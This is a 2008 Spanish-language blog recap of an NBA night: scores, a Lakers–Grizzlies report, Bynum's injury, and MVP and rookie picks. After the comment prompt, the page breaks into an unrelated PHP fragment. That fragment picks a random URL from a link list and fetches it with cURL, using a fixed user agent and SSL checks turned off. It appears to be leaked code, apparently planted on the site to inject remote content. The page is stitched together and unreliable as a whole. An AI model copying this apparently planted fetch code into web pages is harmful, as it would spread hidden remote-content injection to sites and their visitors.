La crónica (13/01/08)

14 de January de 2008 por MagicJohnson32

La jornada de ayer se abrió en Toronto, con un trepidante duelo que los Blazers salvaron milagrosamente por dos veces, primero con una jugada de 3+1 de Outlaw y, ya en la prórroga, con otro espectacular triple de Roy, pero que los Raptors acabaron ganando tras 10 minutos extra gracias al inconmensurable trío Bosh-Parker-Calderón. A continuación, los Hawks pusieron fin, de la mano de Joe Johnson, a una racha de 12 derrotas seguidas ante los Bulls, y los Hornets ampliaron la suya de triunfos a domicilio al ganar en Houston. La mayor sorpresa de la noche llegó en NY, donde los Knicks pasaron por encima de los Pistons, que sólo evitaron su peor anotación de la historia con una jugada de tres puntos de Amir Johnson a 13 segundos para el final. Por último, Warriors y Lakers se impusieron con dificultades a Pacers y Grizzlies respectivamente, y para los angelinos el triunfo resultó especialmente caro ya que Andrew Bynum cayó lesionado.

 

A continuación, resultados y lo más destacado de entre todo lo ocurrido:

Resultados:

Blazers 109 – 116 Raptors

Bulls 84 – 105 Hawks

Hornets 87 – 82 Rockets

Pistons 65 – 89 Knicks

Pacers 101 – 106 Warriors

El partido de la noche: Grizzlies 99 – 100 Lakers

Victoria por la mínima de los Lakers gracias a un tiro libre de Kwame Brown a 9 segundos para el final, que permite  los angelinos seguir con su racha de victorias y acumular ya 6 seguidas. Sin embargo, les trajo la malísima noticia de la lesión de Andrew Bynum, que como mínimo se perderá lo que queda del mes de enero e incluso podria llegar a los 2 bynuminjurygrizzmeses de baja.

En lo que al partido se refiere, los angelinos dominaron el encuentro mientras Bynum estuvo en pista. Tras su lesión los Grizzlies se acercaron en el marcador para finalmente ahogarse en la orilla. Kobe tuvo que asumir más juego ofensivo, lo que no evitó que robase hasta 4 balones, acabó con 37-3-4 y una sola pérdida. A Bynum le dio tiempo en 20 minutos a firmar 10-9-3, mientras que Odom llegó al 10-10, con más minutos pero con menos influencia en el juego. Farmar y Fisher desde la posicion de base sumaron 19 puntos, 6 asistencias, 4 rebotes y 4 robos de balón.

En Memphis parece que Pau Gasol ha despertado de su letargo, y que Iavaroni le da los galones que merece. El pívot español cuajó una tremenda actuación con 21-18-8 y 4 tapones, con una muy buena serie de tiros (10 de 16). Mike Miller fue el máximo anotador con 27 puntos, el gran peligro desde el perímetro con un 4 de 6 en triples y 11 de 16 en tiros de campo. El parte negativa la puso Rudy Gay, que, pese a su triple para empatar el partido a 99, resultó ser un lastre para sus compañeros: en 30 minutos fue capaz de perder 3 balones, cometer 6 faltas y fallar hasta 14 tiros para un espeluznante 5 de 19. Mike Conley sumó un 10-7-4 con una buena dirección de juego, pero dejando también claro su mal tiro de media y larga distancia. Navarro estuvo en su nivel, aunque falló 2 tiros libres (muy raro en él) importantísimos al final del partido.

 jjohnsonbullsdengNuestro MVP: empezó la temporada bastante desacertado pero, igual que su equipo, Joe Johnson se está entonando y saca su clase a relucir con mayor frecuencia. Anoche dio un recital ante los Bulls y logró 37 puntos con 13 de 23 en tiros de campo, 5 de 6 en triples, más 9 rebotes y 6 asistencias con una sola pérdida. Los Hawks sueñan con los Playoffs y Joe Johnson es una de las razones.

El rookie de la noche: poco brillo entre los rookies. Aaron Brooks logró 11 puntos y 3 asistencias para los Rockets y Conley hizo 10 puntos, 7 asistencias y 4 rebotes para los Grizzlies, aunque ambos no pudieron celebrar sus actuaciones con un triunfo.pistonsmadison

La sorpresa de la noche: lo que más nos sorprendió anoche no fue un jugador sino una jugada. Perdían los Blazers por cuatro puntos a falta de 23 segundos. Roy dividió por el centro de la botella y se la dobló a Travis Outlaw, quien recibió y se elevó para lanzar. Jamario Moon trató de puntear el tiro con tanto celo que golpeó a Outlaw pero no evitó la canasta. Jugada de 4 puntos y partido a la prórroga.

La decepción: dentro de la desastrosa noche que protagonizaron los Pistons, dos de sus mejores jugadores destacaron en lo negativo. Richard Hamilton y Tayshaun Prince se combinaron para hacer 1 de 17 en tiros de campo, 3 puntos, 5 rebotes y 1 asistencia en algo más de 25 minutos por cabeza.

Para finalizar, las 10 mejores jugadas de la noche:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>